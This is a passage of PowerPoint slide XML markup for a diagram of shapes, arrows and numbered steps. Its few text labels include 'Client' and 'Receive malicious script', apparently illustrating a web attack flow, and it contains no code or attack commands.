              <a:gd name="T59" fmla="*/ 307 h 471170"/>
              <a:gd name="T60" fmla="*/ 1866 w 471170"/>
              <a:gd name="T61" fmla="*/ 549 h 471170"/>
              <a:gd name="T62" fmla="*/ 2011 w 471170"/>
              <a:gd name="T63" fmla="*/ 856 h 471170"/>
              <a:gd name="T64" fmla="*/ 2125 w 471170"/>
              <a:gd name="T65" fmla="*/ 1221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49552" y="137685"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="464888" y="182834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="470745" y="228730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467591" y="274118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455895" y="317745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436126" y="358355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408751" y="394696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374239" y="425513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333059" y="449552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287910" y="464888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242014" y="470745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196626" y="467591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152999" y="455895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112389" y="436126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76048" y="408751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45231" y="374239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21192" y="333059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5856" y="287910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="242014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3153" y="196626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14849" y="152999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34619" y="112389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61993" y="76048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96505" y="45231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137685" y="21193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182834" y="5856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274118" y="3153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317745" y="14849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358355" y="34619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394696" y="61993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425513" y="96505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449552" y="137685"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25399">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532EAB35-6D7F-4E4B-85E6-C2599A331430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1200000">
            <a:off x="3430588" y="3730625"/>
            <a:ext cx="406400" cy="346075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2730"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157719" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{336DAC25-59A1-D54D-A29F-356EA8F90DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7312025" y="6151563"/>
            <a:ext cx="379413" cy="3635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20" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A83F677-9F2F-3340-8A68-2E6E16779848}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="320675" cy="3032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7721" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{678DC153-F8AE-CB4D-A417-A8C0424E6A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="322263" cy="303212"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 415290"/>
              <a:gd name="T1" fmla="*/ 0 h 379729"/>
              <a:gd name="T2" fmla="*/ 2020 w 415290"/>
              <a:gd name="T3" fmla="*/ 0 h 379729"/>
              <a:gd name="T4" fmla="*/ 2020 w 415290"/>
              <a:gd name="T5" fmla="*/ 3364 h 379729"/>
              <a:gd name="T6" fmla="*/ 0 w 415290"/>
              <a:gd name="T7" fmla="*/ 3364 h 379729"/>
              <a:gd name="T8" fmla="*/ 0 w 415290"/>
              <a:gd name="T9" fmla="*/ 0 h 379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290" h="379729">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="415086" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415086" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF2A0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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B95B5E24-A2A5-F845-8650-EB7501ED210B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2754313" y="3719513"/>
            <a:ext cx="3776662" cy="1550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9323171-6B22-754F-A15E-CF06CD702D19}"/>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8723" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CB2CF9A-CB2E-0A4D-887F-C780B1FAD5DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1287463" y="3395663"/>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24" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{038D6124-380C-304D-BD80-BB48C2732006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3405188"/>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25" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F333469-7F10-AD45-A32D-A991B9C8AD4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3405188"/>
            <a:ext cx="1408113" cy="1517650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1821814"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 8150 w 1821814"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 8150 w 1821814"/>
              <a:gd name="T5" fmla="*/ 16095 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 1821814"/>
              <a:gd name="T7" fmla="*/ 16095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18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1821218"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EBCF75B6-7D20-BB43-9329-7841BD40FE8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="4017963"/>
            <a:ext cx="1009650" cy="292100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">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latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B754EB-97D0-8642-A0FD-5B56C4040C81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="2874963"/>
            <a:ext cx="923925" cy="430212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158728" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{500C32AA-01F9-4643-B25D-9A1B6D430BD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="4981575"/>
            <a:ext cx="1760537" cy="15986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29" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C5AA9B7-2C41-4E4A-AB75-09EC80F88858}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="15192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30" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF5BBFBB-E553-824A-A012-938BC432B423}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="1519237"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2176145"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 9833 w 2176145"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 9833 w 2176145"/>
              <a:gd name="T5" fmla="*/ 16453 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 2176145"/>
              <a:gd name="T7" fmla="*/ 16453 h 1905000"/>
              <a:gd name="T8" fmla="*/ 0 w 2176145"/>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6145" h="1905000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2176145" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217614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8731" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{094D6260-9602-E646-8D49-18A9245B569A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="1530350"/>
            <a:ext cx="1741487" cy="15795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32" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFC0E607-EEA8-104A-843F-1A464C594243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="1541463"/>
            <a:ext cx="1682750" cy="1517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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{181AAF7D-A4B4-E645-B945-1A7F8495F560}"/>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58734" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5E0D7BA-0EF0-4449-ACD2-DE35F7BF36A9}"/>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8735" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89C5A40F-E99E-7147-919E-F777248DFCF0}"/>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8736" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B24646EF-FCB9-314C-9438-8B34F7F07281}"/>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8737" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C66DDA8A-5957-1945-8218-D1E913E830B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6399213" y="5156200"/>
            <a:ext cx="263525" cy="227013"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 534 w 339725"/>
              <a:gd name="T1" fmla="*/ 0 h 284479"/>
              <a:gd name="T2" fmla="*/ 0 w 339725"/>
              <a:gd name="T3" fmla="*/ 2486 h 284479"/>
              <a:gd name="T4" fmla="*/ 1638 w 339725"/>
              <a:gd name="T5" fmla="*/ 2210 h 284479"/>
              <a:gd name="T6" fmla="*/ 534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110566" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="284048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339318" y="252590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1105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8738" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5DEC1C4-E90D-E941-96C9-9B7A58B26C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2700338" y="4316413"/>
            <a:ext cx="261937" cy="227012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1443 w 339725"/>
              <a:gd name="T1" fmla="*/ 0 h 284479"/>
              <a:gd name="T2" fmla="*/ 0 w 339725"/>
              <a:gd name="T3" fmla="*/ 271 h 284479"/>
              <a:gd name="T4" fmla="*/ 971 w 339725"/>
              <a:gd name="T5" fmla="*/ 2484 h 284479"/>
              <a:gd name="T6" fmla="*/ 1443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339369" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="30962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228396" y="283883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3393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 name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93906697-FD9F-844E-8A03-42BC3D544C0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1260000">
            <a:off x="3359150" y="5057775"/>
            <a:ext cx="3617913" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2174"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3400" baseline="1915" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2300" spc="12" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2300" spc="-82" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" spc="59" baseline="-1915" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr sz="3400" baseline="-1915" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158740" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AA4149B-9C02-7143-B06E-0B96B701D320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3154363" y="4156075"/>
            <a:ext cx="365125" cy="376238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2135 w 471170"/>
              <a:gd name="T1" fmla="*/ 1262 h 471170"/>
              <a:gd name="T2" fmla="*/ 2202 w 471170"/>
              <a:gd name="T3" fmla="*/ 1666 h 471170"/>
              <a:gd name="T4" fmla="*/ 2226 w 471170"/>
              <a:gd name="T5" fmla="*/ 2074 h 471170"/>
              <a:gd name="T6" fmla="*/ 2207 w 471170"/>
              <a:gd name="T7" fmla="*/ 2475 h 471170"/>
              <a:gd name="T8" fmla="*/ 2147 w 471170"/>
              <a:gd name="T9" fmla="*/ 2860 h 471170"/>
              <a:gd name="T10" fmla="*/ 2050 w 471170"/>
              <a:gd name="T11" fmla="*/ 3217 h 471170"/>
              <a:gd name="T12" fmla="*/ 1917 w 471170"/>
              <a:gd name="T13" fmla="*/ 3534 h 471170"/>
              <a:gd name="T14" fmla="*/ 1751 w 471170"/>
              <a:gd name="T15" fmla="*/ 3801 h 471170"/>
              <a:gd name="T16" fmla="*/ 1554 w 471170"/>
              <a:gd name="T17" fmla="*/ 4007 h 471170"/>
              <a:gd name="T18" fmla="*/ 1338 w 471170"/>
              <a:gd name="T19" fmla="*/ 4134 h 471170"/>
              <a:gd name="T20" fmla="*/ 1121 w 471170"/>
              <a:gd name="T21" fmla="*/ 4178 h 471170"/>
              <a:gd name="T22" fmla="*/ 907 w 471170"/>
              <a:gd name="T23" fmla="*/ 4141 h 471170"/>
              <a:gd name="T24" fmla="*/ 702 w 471170"/>
              <a:gd name="T25" fmla="*/ 4029 h 471170"/>
              <a:gd name="T26" fmla="*/ 511 w 471170"/>
              <a:gd name="T27" fmla="*/ 3846 h 471170"/>
              <a:gd name="T28" fmla="*/ 343 w 471170"/>
              <a:gd name="T29" fmla="*/ 3597 h 471170"/>
              <a:gd name="T30" fmla="*/ 201 w 471170"/>
              <a:gd name="T31" fmla="*/ 3285 h 471170"/>
              <a:gd name="T32" fmla="*/ 91 w 471170"/>
              <a:gd name="T33" fmla="*/ 2915 h 471170"/>
              <a:gd name="T34" fmla="*/ 23 w 471170"/>
              <a:gd name="T35" fmla="*/ 2512 h 471170"/>
              <a:gd name="T36" fmla="*/ 0 w 471170"/>
              <a:gd name="T37" fmla="*/ 2103 h 471170"/>
              <a:gd name="T38" fmla="*/ 19 w 471170"/>
              <a:gd name="T39" fmla="*/ 1702 h 471170"/>
              <a:gd name="T40" fmla="*/ 79 w 471170"/>
              <a:gd name="T41" fmla="*/ 1318 h 471170"/>
              <a:gd name="T42" fmla="*/ 177 w 471170"/>
              <a:gd name="T43" fmla="*/ 961 h 471170"/>
              <a:gd name="T44" fmla="*/ 309 w 471170"/>
              <a:gd name="T45" fmla="*/ 644 h 471170"/>
              <a:gd name="T46" fmla="*/ 475 w 471170"/>
              <a:gd name="T47" fmla="*/ 376 h 471170"/>
              <a:gd name="T48" fmla="*/ 672 w 471170"/>
              <a:gd name="T49" fmla="*/ 171 h 471170"/>
              <a:gd name="T50" fmla="*/ 887 w 471170"/>
              <a:gd name="T51" fmla="*/ 43 h 471170"/>
              <a:gd name="T52" fmla="*/ 1105 w 471170"/>
              <a:gd name="T53" fmla="*/ 0 h 471170"/>
              <a:gd name="T54" fmla="*/ 1319 w 471170"/>
              <a:gd name="T55" fmla="*/ 37 h 471170"/>
              <a:gd name="T56" fmla="*/ 1524 w 471170"/>
              <a:gd name="T57" fmla="*/ 148 h 471170"/>
              <a:gd name="T58" fmla="*/ 1714 w 471170"/>
              <a:gd name="T59" fmla="*/ 331 h 471170"/>
              <a:gd name="T60" fmla="*/ 1882 w 471170"/>
              <a:gd name="T61" fmla="*/ 581 h 471170"/>
              <a:gd name="T62" fmla="*/ 2025 w 471170"/>
              <a:gd name="T63" fmla="*/ 893 h 471170"/>
              <a:gd name="T64" fmla="*/ 2135 w 471170"/>
              <a:gd name="T65" fmla="*/ 1262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51630" y="142261"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="466021" y="187720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="470920" y="233728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466820" y="279041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="454217" y="322414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="433605" y="362603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405478" y="398365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370331" y="428456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328659" y="451630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283199" y="466021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237191" y="470920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191879" y="466820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148505" y="454217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108316" y="433605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72554" y="405478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42464" y="370331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19289" y="328659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4898" y="283199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="237191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4099" y="191879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16702" y="148506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37315" y="108316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65441" y="72554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100588" y="42464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142261" y="19289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187720" y="4898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233728" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279040" y="4099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322414" y="16702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362603" y="37315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398365" y="65441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428456" y="100588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451630" y="142261"/>
                </a:lnTo>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object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCA5CC96-D2D4-4846-9C5B-697EEA5F4D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1260000">
            <a:off x="3201988" y="4240213"/>
            <a:ext cx="406400" cy="346075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
